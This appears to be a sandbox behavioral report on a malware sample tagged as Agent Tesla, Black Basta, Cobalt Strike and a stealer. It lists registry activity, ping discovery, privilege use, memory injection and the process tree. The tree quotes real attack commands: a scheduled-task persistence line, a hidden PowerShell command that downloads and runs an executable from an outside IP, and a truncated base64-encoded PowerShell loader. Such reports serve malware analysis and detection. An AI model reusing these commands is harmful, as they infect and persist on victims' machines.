Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	149b288636.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2f5c500416.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	80971a3226.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	25e0e44750.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	389f4e0c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u75a1_003.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
11864	PING.EXE
9940	PING.EXE
11516	PING.EXE
12660	PING.EXE
12768	PING.EXE
12232	PING.EXE
12272	PING.EXE
8608	PING.EXE
9772	PING.EXE
10228	PING.EXE
6008	PING.EXE
13040	PING.EXE
1780	PING.EXE
7456	PING.EXE
8328	PING.EXE
9644	PING.EXE
11280	PING.EXE
1484	PING.EXE
11216	PING.EXE
9456	PING.EXE
9856	PING.EXE
4060	PING.EXE
12704	PING.EXE
11936	PING.EXE
12556	PING.EXE
4664	PING.EXE
1552	PING.EXE
11348	PING.EXE
12320	PING.EXE
8972	PING.EXE
9024	PING.EXE
12824	PING.EXE
6620	PING.EXE
3108	PING.EXE
12368	PING.EXE
7612	PING.EXE
9812	PING.EXE
10712	PING.EXE
7932	PING.EXE
8008	PING.EXE
10004	PING.EXE
11580	PING.EXE
400	PING.EXE
3532	PING.EXE
5816	PING.EXE
8756	PING.EXE
10688	PING.EXE
10916	PING.EXE
13196	PING.EXE
11624	PING.EXE
11816	PING.EXE
12040	PING.EXE
2556	PING.EXE
6940	PING.EXE
544	PING.EXE
8504	PING.EXE
9728	PING.EXE
10480	PING.EXE
6448	PING.EXE
4256	PING.EXE
3824	PING.EXE
9500	PING.EXE
11584	PING.EXE
8140	PING.EXE

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
4064	timeout.exe
2608	timeout.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
12040	PING.EXE
5960	PING.EXE
8436	PING.EXE
8504	PING.EXE
9456	PING.EXE
9612	PING.EXE
10860	PING.EXE
6540	PING.EXE
11884	PING.EXE
12924	PING.EXE
10872	PING.EXE
4664	PING.EXE
11668	PING.EXE
3532	PING.EXE
13108	PING.EXE
8140	PING.EXE
1912	PING.EXE
8756	PING.EXE
9500	PING.EXE
10304	PING.EXE
6212	PING.EXE
5816	PING.EXE
3824	PING.EXE
400	PING.EXE
8856	PING.EXE
9856	PING.EXE
13040	PING.EXE
11280	PING.EXE
5192	PING.EXE
6896	PING.EXE
9728	PING.EXE
11216	PING.EXE
12608	PING.EXE
8328	PING.EXE
11176	PING.EXE
6400	PING.EXE
10980	PING.EXE
12368	PING.EXE
7052	PING.EXE
9812	PING.EXE
11584	PING.EXE
1552	PING.EXE
11348	PING.EXE
12124	PING.EXE
12704	PING.EXE
7876	PING.EXE
8972	PING.EXE
9940	PING.EXE
4060	PING.EXE
8804	PING.EXE
11472	PING.EXE
12984	PING.EXE
10804	PING.EXE
7404	PING.EXE
9560	PING.EXE
9644	PING.EXE
224	PING.EXE
11160	PING.EXE
11468	PING.EXE
7612	PING.EXE
8008	PING.EXE
8552	PING.EXE
12276	PING.EXE
10536	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2444	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5408	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2944	powershell.exe
2944	powershell.exe
3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
5992	rapes.exe
5992	rapes.exe
4072	Rm3cVPI.exe
4072	Rm3cVPI.exe
4072	Rm3cVPI.exe
4072	Rm3cVPI.exe
2664	149b288636.exe
2664	149b288636.exe
5408	powershell.exe
5408	powershell.exe
5408	powershell.exe
6080	powershell.exe
6080	powershell.exe
6080	powershell.exe
844	rapes.exe
844	rapes.exe
2944	dd83afce66.exe
2944	dd83afce66.exe
2944	dd83afce66.exe
2944	dd83afce66.exe
2944	dd83afce66.exe
2944	dd83afce66.exe
1044	MSBuild.exe
1044	MSBuild.exe
1044	MSBuild.exe
1044	MSBuild.exe
5948	MSBuild.exe
5948	MSBuild.exe
5948	MSBuild.exe
5948	MSBuild.exe
3136	2f5c500416.exe
3136	2f5c500416.exe
3136	2f5c500416.exe
3136	2f5c500416.exe
3136	2f5c500416.exe
3136	2f5c500416.exe
5424	MSBuild.exe
5424	MSBuild.exe
5424	MSBuild.exe
5424	MSBuild.exe
4920	MSBuild.exe
4920	MSBuild.exe
4920	MSBuild.exe
4920	MSBuild.exe
3508	80971a3226.exe
3508	80971a3226.exe
1424	Bell_Setup16.tmp
1424	Bell_Setup16.tmp
1272	regsvr32.exe
1272	regsvr32.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe
5784	PowerShell.exe
5784	PowerShell.exe
5784	PowerShell.exe
4340	powershell.exe
4340	powershell.exe
4340	powershell.exe
1272	regsvr32.exe

Suspicious behavior: LoadsDriver 9 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
1424	tzutil.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5420	u75a1_003.exe
5420	u75a1_003.exe
5420	u75a1_003.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	5408	powershell.exe
Token: SeDebugPrivilege	6080	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeIncreaseQuotaPrivilege	4676	powershell.exe
Token: SeSecurityPrivilege	4676	powershell.exe
Token: SeTakeOwnershipPrivilege	4676	powershell.exe
Token: SeLoadDriverPrivilege	4676	powershell.exe
Token: SeSystemProfilePrivilege	4676	powershell.exe
Token: SeSystemtimePrivilege	4676	powershell.exe
Token: SeProfSingleProcessPrivilege	4676	powershell.exe
Token: SeIncBasePriorityPrivilege	4676	powershell.exe
Token: SeCreatePagefilePrivilege	4676	powershell.exe
Token: SeBackupPrivilege	4676	powershell.exe
Token: SeRestorePrivilege	4676	powershell.exe
Token: SeShutdownPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeSystemEnvironmentPrivilege	4676	powershell.exe
Token: SeRemoteShutdownPrivilege	4676	powershell.exe
Token: SeUndockPrivilege	4676	powershell.exe
Token: SeManageVolumePrivilege	4676	powershell.exe
Token: 33	4676	powershell.exe
Token: 34	4676	powershell.exe
Token: 35	4676	powershell.exe
Token: 36	4676	powershell.exe
Token: SeDebugPrivilege	5784	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	5784	PowerShell.exe
Token: SeSecurityPrivilege	5784	PowerShell.exe
Token: SeTakeOwnershipPrivilege	5784	PowerShell.exe
Token: SeLoadDriverPrivilege	5784	PowerShell.exe
Token: SeSystemProfilePrivilege	5784	PowerShell.exe
Token: SeSystemtimePrivilege	5784	PowerShell.exe
Token: SeProfSingleProcessPrivilege	5784	PowerShell.exe
Token: SeIncBasePriorityPrivilege	5784	PowerShell.exe
Token: SeCreatePagefilePrivilege	5784	PowerShell.exe
Token: SeBackupPrivilege	5784	PowerShell.exe
Token: SeRestorePrivilege	5784	PowerShell.exe
Token: SeShutdownPrivilege	5784	PowerShell.exe
Token: SeDebugPrivilege	5784	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	5784	PowerShell.exe
Token: SeRemoteShutdownPrivilege	5784	PowerShell.exe
Token: SeUndockPrivilege	5784	PowerShell.exe
Token: SeManageVolumePrivilege	5784	PowerShell.exe
Token: 33	5784	PowerShell.exe
Token: 34	5784	PowerShell.exe
Token: 35	5784	PowerShell.exe
Token: 36	5784	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	5784	PowerShell.exe
Token: SeSecurityPrivilege	5784	PowerShell.exe
Token: SeTakeOwnershipPrivilege	5784	PowerShell.exe
Token: SeLoadDriverPrivilege	5784	PowerShell.exe
Token: SeSystemProfilePrivilege	5784	PowerShell.exe
Token: SeSystemtimePrivilege	5784	PowerShell.exe
Token: SeProfSingleProcessPrivilege	5784	PowerShell.exe
Token: SeIncBasePriorityPrivilege	5784	PowerShell.exe
Token: SeCreatePagefilePrivilege	5784	PowerShell.exe
Token: SeBackupPrivilege	5784	PowerShell.exe
Token: SeRestorePrivilege	5784	PowerShell.exe
Token: SeShutdownPrivilege	5784	PowerShell.exe
Token: SeDebugPrivilege	5784	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	5784	PowerShell.exe
Token: SeRemoteShutdownPrivilege	5784	PowerShell.exe
Token: SeUndockPrivilege	5784	PowerShell.exe
Token: SeManageVolumePrivilege	5784	PowerShell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1564	amnew.exe
1424	Bell_Setup16.tmp

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3360 wrote to memory of 4328	3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3360 wrote to memory of 4328	3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3360 wrote to memory of 4328	3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3360 wrote to memory of 1936	3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3360 wrote to memory of 1936	3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3360 wrote to memory of 1936	3360	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 4328 wrote to memory of 2444	4328	cmd.exe	90
PID 4328 wrote to memory of 2444	4328	cmd.exe	90
PID 4328 wrote to memory of 2444	4328	cmd.exe	90
PID 1936 wrote to memory of 2944	1936	mshta.exe	92
PID 1936 wrote to memory of 2944	1936	mshta.exe	92
PID 1936 wrote to memory of 2944	1936	mshta.exe	92
PID 2944 wrote to memory of 3248	2944	powershell.exe	100
PID 2944 wrote to memory of 3248	2944	powershell.exe	100
PID 2944 wrote to memory of 3248	2944	powershell.exe	100
PID 3248 wrote to memory of 5992	3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE	101
PID 3248 wrote to memory of 5992	3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE	101
PID 3248 wrote to memory of 5992	3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE	101
PID 5992 wrote to memory of 4072	5992	rapes.exe	105
PID 5992 wrote to memory of 4072	5992	rapes.exe	105
PID 5992 wrote to memory of 4072	5992	rapes.exe	105
PID 5992 wrote to memory of 2664	5992	rapes.exe	106
PID 5992 wrote to memory of 2664	5992	rapes.exe	106
PID 5992 wrote to memory of 2664	5992	rapes.exe	106
PID 5992 wrote to memory of 2004	5992	rapes.exe	107
PID 5992 wrote to memory of 2004	5992	rapes.exe	107
PID 5992 wrote to memory of 2004	5992	rapes.exe	107
PID 2004 wrote to memory of 412	2004	cmd.exe	109
PID 2004 wrote to memory of 412	2004	cmd.exe	109
PID 2004 wrote to memory of 412	2004	cmd.exe	109
PID 412 wrote to memory of 5408	412	cmd.exe	111
PID 412 wrote to memory of 5408	412	cmd.exe	111
PID 412 wrote to memory of 5408	412	cmd.exe	111
PID 5408 wrote to memory of 6080	5408	powershell.exe	112
PID 5408 wrote to memory of 6080	5408	powershell.exe	112
PID 5408 wrote to memory of 6080	5408	powershell.exe	112
PID 5992 wrote to memory of 220	5992	rapes.exe	115
PID 5992 wrote to memory of 220	5992	rapes.exe	115
PID 5992 wrote to memory of 220	5992	rapes.exe	115
PID 220 wrote to memory of 2624	220	25e0e44750.exe	116
PID 220 wrote to memory of 2624	220	25e0e44750.exe	116
PID 220 wrote to memory of 2624	220	25e0e44750.exe	116
PID 2624 wrote to memory of 4508	2624	221.exe	118
PID 2624 wrote to memory of 4508	2624	221.exe	118
PID 4508 wrote to memory of 5912	4508	cmd.exe	121
PID 4508 wrote to memory of 5912	4508	cmd.exe	121
PID 4508 wrote to memory of 5912	4508	cmd.exe	121
PID 5912 wrote to memory of 5300	5912	221.exe	122
PID 5912 wrote to memory of 5300	5912	221.exe	122
PID 5300 wrote to memory of 4560	5300	cmd.exe	124
PID 5300 wrote to memory of 4560	5300	cmd.exe	124
PID 5300 wrote to memory of 5472	5300	cmd.exe	125
PID 5300 wrote to memory of 5472	5300	cmd.exe	125
PID 5300 wrote to memory of 4064	5300	cmd.exe	126
PID 5300 wrote to memory of 4064	5300	cmd.exe	126
PID 5300 wrote to memory of 2036	5300	cmd.exe	127
PID 5300 wrote to memory of 2036	5300	cmd.exe	127
PID 5300 wrote to memory of 756	5300	cmd.exe	128
PID 5300 wrote to memory of 756	5300	cmd.exe	128
PID 5300 wrote to memory of 1552	5300	cmd.exe	129
PID 5300 wrote to memory of 1552	5300	cmd.exe	129
PID 5300 wrote to memory of 2440	5300	cmd.exe	130
PID 5300 wrote to memory of 2440	5300	cmd.exe	130
PID 5300 wrote to memory of 5308	5300	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn 40qccmaDpG0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn 40qccmaDpG0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2444
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Users\Admin\AppData\Local\TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
      "C:\Users\Admin\AppData\Local\TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3248
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5992
      - C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4072
      - C:\Users\Admin\AppData\Local\Temp\10362200101\149b288636.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10362200101\149b288636.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2664
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnl